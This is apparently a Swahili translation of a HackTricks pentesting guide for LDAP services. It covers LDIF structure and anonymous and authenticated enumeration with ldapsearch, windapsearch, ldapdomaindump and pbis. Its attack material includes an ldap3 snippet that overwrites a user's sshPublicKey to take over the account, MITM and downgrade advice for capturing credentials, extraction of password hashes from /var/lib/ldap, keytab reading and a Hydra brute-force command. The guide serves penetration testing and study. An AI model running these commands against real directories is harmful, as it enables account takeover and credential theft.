hacktricks/network-services-pentesting/pentesting-ldap.md

# 389, 636, 3268, 3269 - Pentesting LDAP

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

Matumizi ya **LDAP** (Itifaki ya Upatikanaji Rahisi wa Dircetory) yanahusiana sana na kutafuta vitengo mbalimbali kama vile mashirika, watu binafsi, na rasilimali kama faili na vifaa ndani ya mitandao, iwe ya umma au ya kibinafsi. Inatoa njia iliyopunguzwa ikilinganishwa na mtangulizi wake, DAP, kwa kuwa na kificho kidogo.

Miongozo ya LDAP imepangwa ili kuruhusu usambazaji wao kwenye seva kadhaa, ambapo kila seva ina nakala iliyohifadhiwa na kusawazishwa ya saraka, inayojulikana kama Wakala wa Mfumo wa Saraka (DSA). Jukumu la kushughulikia maombi liko kabisa kwa seva ya LDAP, ambayo inaweza kuwasiliana na DSA nyingine kama inavyohitajika ili kutoa jibu moja kwa mwenyeombaji.

Muundo wa saraka ya LDAP unaonekana kama **muundo wa mti, ukiwa na saraka ya mizizi juu**. Hii inagawanyika katika nchi, ambazo zinagawanyika zaidi katika mashirika, na kisha kwenye vitengo vya shirika vinavyowakilisha idara au sehemu mbalimbali, hatimaye kufikia kiwango cha vitengo binafsi, ikiwa ni pamoja na watu na rasilimali zinazoshiriki kama faili na printa.

**Bandari ya chaguo-msingi:** 389 na 636 (ldaps). Katalogi ya Kimataifa (LDAP katika ActiveDirectory) inapatikana kwa chaguo-msingi kwenye bandari 3268, na 3269 kwa LDAPS.
```
PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped
```
### LDAP Fomati ya Kubadilishana Data

LDIF (LDAP Fomati ya Kubadilishana Data) inafafanua yaliyomo ya saraka kama seti ya rekodi. Pia inaweza kuwakilisha maombi ya kusasisha (Ongeza, Badilisha, Futa, Badilisha Jina).
```bash
dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
```
* Mistari 1-3 yanafafanua kikoa cha kiwango cha juu cha ndani
* Mistari 5-8 yanafafanua kikoa cha kiwango cha kwanza cha moneycorp (moneycorp.local)
* Mistari 10-16 yanafafanua vitengo viwili vya shirika: dev na mauzo
* Mistari 18-26 yanajenga kitu cha kikoa na kutoa sifa na thamani

## Andika data

Tafadhali kumbuka kuwa ikiwa unaweza kubadilisha thamani, unaweza kufanya vitendo vya kuvutia sana. Kwa mfano, fikiria kwamba **unaweza kubadilisha habari ya "sshPublicKey"** ya mtumiaji wako au mtumiaji yeyote. Ni uwezekano mkubwa kwamba ikiwa sifa hii ipo, basi **ssh inasoma funguo za umma kutoka LDAP**. Ikiwa unaweza kubadilisha funguo za umma za mtumiaji, **utaweza kuingia kama mtumiaji huyo hata ikiwa uwakilishi wa nenosiri haipo katika ssh**.
```bash
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
## Pata Nakala za Vitambulisho Wazi

Ikiwa LDAP inatumika bila SSL, unaweza **kupata nakala za vitambulisho wazi** kwenye mtandao.

Pia, unaweza kufanya shambulio la **MITM** kwenye mtandao **kati ya seva ya LDAP na mteja.** Hapa unaweza kufanya **Shambulio la Kupunguza kiwango** ili mteja atumie **vitambulisho wazi** kuingia.

**Ikiwa SSL inatumika**, unaweza jaribu kufanya **MITM** kama ilivyotajwa hapo juu lakini kwa kutoa **cheti bandia**, ikiwa **mtumiaji anakubali**, unaweza kupunguza kiwango cha njia ya uwakilishi na kuona tena vitambulisho.

## Upatikanaji Usio na Jina

### Pita Ukaguzi wa TLS SNI

Kulingana na [**makala hii**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/), kwa tu kufikia seva ya LDAP na jina la kikoa cha kubahatisha (kama vile company.com), alikuwa na uwezo wa kuwasiliana na huduma ya LDAP na kutoa habari kama mtumiaji asiyejulikana:
```bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
### Kufunga kwa LDAP bila kitambulisho

[Kufunga kwa LDAP bila kitambulisho](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) kuruhusu **wahalifu wasiothibitishwa** kupata habari kutoka kwa kikoa, kama vile orodha kamili ya watumiaji, vikundi, kompyuta, sifa za akaunti ya mtumiaji, na sera ya nenosiri ya kikoa. Hii ni **mpangilio wa zamani**, na tangu Windows Server 2003, watumiaji waliothibitishwa tu wanaruhusiwa kuanzisha ombi la LDAP.\
Hata hivyo, wahudumu wanaweza kuwa wamehitaji **kuweka programu fulani kuruhusu kufunga bila kitambulisho** na kutoa ufikiaji zaidi ya kiwango kilichokusudiwa, hivyo kutoa watumiaji wasiothibitishwa ufikiaji wa vitu vyote katika AD.

## Vitambulisho Sahihi

Ikiwa una vitambulisho sahihi kuingia kwenye seva ya LDAP, unaweza kudondosha habari yote kuhusu Msimamizi wa Kikoa kwa kutumia:

[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
```bash
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)

## Uchunguzi

### Kiotomatiki

Kwa kutumia hii utaweza kuona **habari za umma** (kama jina la kikoa)**:**
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
### Python

<details>

<summary>Angalia utambuzi wa LDAP na python</summary>

Unaweza kujaribu **kutambua LDAP na au bila ya sifa za utambulisho kwa kutumia python**: `pip3 install ldap3`

Kwanza jaribu **kuunganisha bila** sifa za utambulisho:
```bash
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info
```
Ikiwa jibu ni `True` kama ilivyokuwa kwenye mfano uliopita, unaweza kupata baadhi ya **data muhimu** ya LDAP (kama vile **naming context** au **domain name**) kutoka kwa:
```bash
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN
```
Marudio unapokuwa na muktadha wa jina unaweza kufanya maswali zaidi ya kusisimua. Swali hili rahisi linapaswa kuonyesha vitu vyote katika saraka:
```bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries
```
Au **tiririka** ldap nzima:
```bash
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries
```
</details>

### windapsearch

[**Windapsearch**](https://github.com/ropnop/windapsearch) ni skripti ya Python inayotumika kuchunguza watumiaji, vikundi, na kompyuta kutoka kwenye kikoa cha Windows kwa kutumia maswali ya LDAP.
```bash
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
```
### ldapsearch

Angalia vitambulisho vya kufuta au ikiwa vitambulisho vyako ni halali:
```bash
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
```

```bash
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
```
Ikiwa utapata kitu kinasema kwamba "_bind lazima ikamilike_" inamaanisha kuwa vibali ni sahihi.

Unaweza kuchambua **kila kitu kutoka kwenye kikoa** kwa kutumia:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
```
Changanua **watumiaji**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
```
Changanua **kompyuta**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Changanua **taarifa yangu**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Changanua **Domain Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Changanua **Watumiaji wa Kikoa**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Changanua **Enterprise Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Changanua **Wahusika**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Changanua **Kikundi cha Kijijini cha Desktop**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Kuona kama una ufikiaji wa nenosiri lolote, unaweza kutumia grep baada ya kutekeleza moja ya maswali yafuatayo:
```bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
```
Tafadhali, kumbuka kuwa nywila unazoweza kupata hapa hazihitaji kuwa halisi...

#### pbis

Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) na kawaida imewekwa katika `/opt/pbis`.\
**Pbis** inakuruhusu kupata habari za msingi kwa urahisi:
```bash
#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done
```
## Kiolesura cha Picha

### Apache Directory

[**Pakua Apache Directory hapa**](https://directory.apache.org/studio/download/download-linux.html). Unaweza kupata [mfano wa jinsi ya kutumia zana hii hapa](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s).

### jxplorer

Unaweza kupakua kiolesura cha picha na seva ya LDAP hapa: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)

Kwa chaguo-msingi, inasakinishwa katika: _/opt/jxplorer_

![](<../.gitbook/assets/image (22) (1).png>)

### Godap

Unaweza kufikia hapa [https://github.com/Macmod/godap](https://github.com/Macmod/godap)

## Uthibitishaji kupitia kerberos

Kwa kutumia `ldapsearch` unaweza **kuthibitisha** dhidi ya **kerberos badala** ya kupitia **NTLM** kwa kutumia parameter `-Y GSSAPI`

## POST

Ikiwa unaweza kufikia faili ambapo maktaba za data zinapatikana (inaweza kuwa katika _/var/lib/ldap_). Unaweza kuchukua hash kwa kutumia:
```bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
```
Unaweza kumlisha john na hash ya nenosiri (kutoka '{SSHA}' hadi 'structural' bila kuongeza 'structural').

### Faili za Usanidi

* Kwa Ujumla
* containers.ldif
* ldap.cfg
* ldap.conf
* ldap.xml
* ldap-config.xml
* ldap-realm.xml
* slapd.conf
* Seva ya IBM SecureWay V3
* V3.sas.oc
* Seva ya Microsoft Active Directory
* msadClassesAttrs.ldif
* Netscape Directory Server 4
* nsslapd.sas\_at.conf
* nsslapd.sas\_oc.conf
* Seva ya OpenLDAP directory
* slapd.sas\_at.conf
* slapd.sas\_oc.conf
* Sun ONE Directory Server 5.1
* 75sas.ldif

## Amri za Kiotomatiki za HackTricks
```
Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
```
<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>